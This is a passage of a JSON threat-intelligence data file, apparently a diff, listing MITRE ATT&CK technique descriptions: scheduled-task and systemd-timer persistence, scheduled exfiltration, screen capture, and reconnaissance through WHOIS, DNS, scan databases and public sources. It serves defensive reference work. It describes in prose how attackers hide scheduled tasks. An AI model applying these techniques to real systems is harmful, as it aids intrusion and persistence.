[at](https://app.tidalcyber.com/software/af01dc7b-a2bc-4fda-bbfe-d2be889c2860) utility could also be abused by adversaries (ex: [At](https://app.tidalcyber.com/technique/6051e618-c476-41db-8b0b-0aef9d2bbbf7)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://app.tidalcyber.com/technique/f37f0cd5-0446-415f-9309-94e25aa1165d)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).[[SigmaHQ](https://app.tidalcyber.com/references/27812e3f-9177-42ad-8681-91c65aba4743)][[Tarrask scheduled task](https://app.tidalcyber.com/references/87682623-d1dd-4ee8-ae68-b08be5113e3e)] Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.[[Defending Against Scheduled Task Attacks in Windows Environments](https://app.tidalcyber.com/references/111d21df-5531-4927-a173-fac9cd7672b3)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1053.005" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82", + "value": "Scheduled Task" + }, + { + "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://app.tidalcyber.com/technique/803d286d-8104-4af8-9821-3f49240edc2b) in Linux environments.[[archlinux Systemd Timers Aug 2020](https://app.tidalcyber.com/references/670f02f1-3927-4f38-aa2b-9ca0d8cf5b8e)] Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).[[Systemd Remote Control](https://app.tidalcyber.com/references/0461b58e-400e-4e3e-b7c4-eed7a9b0fdd6)]\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://app.tidalcyber.com/technique/7aae1ad0-fb1f-484a-a176-c94e4c7ada77) unit files that are managed by the systemd system and service manager.[[Linux man-pages: systemd January 2014](https://app.tidalcyber.com/references/e9a58efd-8de6-40c9-9638-c642311d6a07)] Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.[[Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018](https://app.tidalcyber.com/references/0654dabf-e885-45bf-8a8e-2b512ff4bf46)][[gist Arch package compromise 10JUL2018](https://app.tidalcyber.com/references/b2900049-444a-4fe5-af1f-b9cd2cd9491c)][[acroread package compromised Arch Linux Mail 8JUL2018](https://app.tidalcyber.com/references/99245022-2130-404d-bf7a-095d84a515cd)] Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.[[Falcon Sandbox smp: 28553b3a9d](https://app.tidalcyber.com/references/f27ab4cb-1666-501a-aa96-537d2b2d1f08)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1053.006" + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea", + "value": "Systemd Timers" + }, + { + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.[[TechNet Task Scheduler Security](https://app.tidalcyber.com/references/3a6d08ba-d79d-46f7-917d-075a98c59228)]\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.[[ProofPoint Serpent](https://app.tidalcyber.com/references/c2f7958b-f521-4133-9aeb-c5c8fae23e78)]", + "meta": { + "platforms": [ + "Containers", + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + }, + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "6051e618-c476-41db-8b0b-0aef9d2bbbf7", + "type": "similar" + }, + { + "dest-uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9", + "type": "similar" + }, + { + "dest-uuid": "803d286d-8104-4af8-9821-3f49240edc2b", + "type": "similar" + }, + { + "dest-uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82", + "type": "similar" + }, + { + "dest-uuid": "8cc9e419-607e-4d2a-91d9-d47022e02bea", + "type": "similar" + } + ], + "uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8", + "value": "Scheduled Task/Job" + }, + { + "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) or [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023", + "type": "uses" + } + ], + "uuid": "ea0557cd-94bc-48cf-9c3b-293c40986464", + "value": "Scheduled Transfer" + }, + { + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.[[CopyFromScreen .NET](https://app.tidalcyber.com/references/b9733af4-ffb4-416e-884e-d51649aecbce)][[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]\n", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "4462ce9d-0a5a-427d-8160-7b307b50cfbd", + "value": "Screen Capture" + }, + { + "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\n\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)] Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1597.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "56ab198f-f8bb-4fe9-bd85-5975d4d3863b", + "value": "Purchase Technical Data" + }, + { + "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)]\n\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1597.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "a150a804-1a17-45aa-a49f-d65ee901ab59", + "value": "Threat Intel Vendors" + }, + { + "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.[[D3Secutrity CTI Feeds](https://app.tidalcyber.com/references/088f2cbd-cce1-477f-9ffb-319477d74b69)] Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.[[ZDNET Selling Data](https://app.tidalcyber.com/references/61d00ae2-5494-4c6c-8860-6826e701ade8)]\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "56ab198f-f8bb-4fe9-bd85-5975d4d3863b", + "type": "similar" + }, + { + "dest-uuid": "a150a804-1a17-45aa-a49f-d65ee901ab59", + "type": "similar" + } + ], + "uuid": "40e4133b-28c2-4da7-9a6a-7392ae87f1da", + "value": "Search Closed Sources" + }, + { + "description": "Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.\n\nAdversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)] Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1596.004" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "d8dcce33-3a7e-4a1c-95c6-afdcf2fa1df6", + "value": "CDNs" + }, + { + "description": "Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.\n\nAdversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)] Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)] Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1596.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "8f707326-d673-43ee-b269-4b6eca5b190a", + "value": "Digital Certificates" + }, + { + "description": "Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.\n\nAdversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)][[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)] Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1596.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "758ad44d-5e29-4c7f-8dae-ddfeb5092ccb", + "value": "DNS/Passive DNS" + }, + { + "description": "Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]\n\nAdversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1596.005" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "b39cc340-ee1d-46a8-add2-f36aade56f15", + "value": "Scan Databases" + }, + { + "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1596.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "ef55dc56-f2eb-4a3b-a271-3f73b4700c89", + "value": "WHOIS" + }, + { + "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)][[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)][[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)][[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)][[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)][[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)][[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "d8dcce33-3a7e-4a1c-95c6-afdcf2fa1df6", + "type": "similar" + }, + { + "dest-uuid": "8f707326-d673-43ee-b269-4b6eca5b190a", + "type": "similar" + }, + { + "dest-uuid": "758ad44d-5e29-4c7f-8dae-ddfeb5092ccb", + "type": "similar" + }, + { + "dest-uuid": "b39cc340-ee1d-46a8-add2-f36aade56f15", + "type": "similar" + }, + { + "dest-uuid": "ef55dc56-f2eb-4a3b-a271-3f73b4700c89", + "type": "similar" + } + ], + "uuid": "cf79ad1b-a82b-486b-88ad-e93bfc1c7439", + "value": "Search Open Technical Databases" + }, + { + "description": "Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. \n\nAdversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.[[GitHub Cloud Service Credentials](https://app.tidalcyber.com/references/d2186b8c-10c9-493b-8e25-7d69fce006e4)] Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)). \n\n**Note:** This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/fe595943-f264-4d05-a8c7-7afc8985bfc3), which focuses on [Collection](https://app.tidalcyber.com/tactics/1ca65327-b553-4923-ae19-8e6987ca250a) from private and internally hosted code repositories. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1593.003" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "2e4201da-fe83-439d-9d40-87e4c1f832fb", + "value": "Code Repositories" + }, + { + "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)][[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1593.002" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "62bc11f9-f88c-437a-98ae-e90def576e7e", + "value": "Search Engines" + }, + { + "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://app.tidalcyber.com/technique/7f953df5-c91f-4975-a579-2be3c89bca7e)).[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)] Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1593.001" + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + } + ], + "uuid": "d97c3d34-1210-4c71-b305-59dcccab8f45", + "value": "Social Media" + }, + { + "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)][[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)][[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "2e4201da-fe83-439d-9d40-87e4c1f832fb", + "type": "similar" + }, + { + "dest-uuid": 